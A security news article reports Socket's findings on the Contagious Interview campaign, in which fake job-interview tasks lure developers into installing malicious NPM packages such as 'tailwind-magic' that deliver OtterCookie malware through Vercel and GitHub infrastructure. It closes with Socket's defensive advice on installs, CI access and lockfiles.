Contagious Interview attackers go ‘full stack’ to fool developers

Researchers at Socket have uncovered more details of a sophisticated software supply-chain operation linked to the Contagious Interview campaign attacking developers who rely on packages from NPM.

They report finding a “full stack” operation behind the attacks, where code hosting, package distribution, staging servers and command-and control (C2) infrastructure are orchestrated much like a legitimate software development and delivery pipeline — and offer honest developers fresh advice on protecting themselves against the attacks.

In the latest wave, threat actors uploaded almost 200 new malicious NPM packages, with more than 31,000 recorded downloads. The campaign lures victims with fake job interviews and coding assignments related to Web3 and blockchain projects, asking them to pull dependencies for a “test project”. But the NPM packages they install are Trojan horses.

The latest packages identified by Socket ultimately deliver a new payload with upgraded credential theft, system monitoring and remote access capabilities, enabling them to take over developers’ accounts and machines.

Point defense

Based on its latest analysis, Socket advised developers to focus on the weak points this campaign exploits, and to treat every “npm install” as potential remote code execution, restrict what continuous-integration runners can access, enforce network egress controls, and review the code of any new templates or utilities pulled from GitHub. Teams should also scrutinize unfamiliar helper packages, pin known-good versions, and use lockfiles instead of auto-updating dependencies, it advised.

Automated package analysis can further reduce risk, with real-time scans catching threats including import-time loaders, network probing, and bulk data exfiltration before they hit developer machines or CI systems.

With these checks in place, dependency onboarding and code review become effective filters for blocking Contagious Interview-style attacks early, Socket said.

Coding tasks lead to malware delivery

These defensive measures are effective because Contagious Interview’s entry vector relies heavily on social engineering, using fake interview tasks to trick developers into installing compromised dependencies.

The campaign exploits NPM, a widely used package registry for JavaScript and Node.js, by publishing packages that appear benign but carry hidden payloads. The malicious packages including one named “tailwind-magic” mimic legitimate libraries (in this case, a typosquatted version of the genuine “tailwind-merge” utility) to avoid suspicion.

When an unsuspecting developer installs such a package, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in turn delivers a live payload fetched from a threat-actor controlled GitHub account named “stardev0914”. From there the payload, a variant of OtterCookie that also folds in capabilities from the campaign’s other signature payload, BeaverTail, executes and establishes a remote connection to the attackers’ control server. The malware then silently harvests credentials, crypto-wallet data, browser profiles and more.

“Tracing the malicious npm package tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app,and from there to the threat actor controlled GitHub account which contained 18 repositories,” Socket’s senior threat intelligence analyst Kirill Boychenko said in a blog post, crediting related research by Kieran Miyamoto that helped confirm the malicious GitHub account stardev0914.

A ‘full stack’adversary: GitHub, Vercel, and NPM

What makes this campaign stand out is the layered infrastructure behind it. Socket’s analysis traced not just the NPM packages but also how the attackers built a complete delivery pipeline: malware serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and remote command execution.

Through this setup, attackers can rotate payloads, update malware unobtrusively, and tailor deployments per target—all while blending deeply into the legitimate developer ecosystem, according to Boychenko.

Once installed, OtterCookie doesn’t just run and vanish: It remains persistent, capable of logging keystrokes, hijacking the clipboard, scanning the filesystem, capturing screenshots, and grabbing browser and wallet credentials across Windows, macOS and Linux.

The campaign actors’ intensified NPM activity arrives at a worrying moment for the JavaScript and open-source ecosystem. In recent months, the community has seen a flurry of NPM-based attacks — including worm-style campaigns that transformed popular packages into Trojan horses, automated credential theft, and widespread supply chain compromise across both development and CI environments.

This article was first published on Infoworld.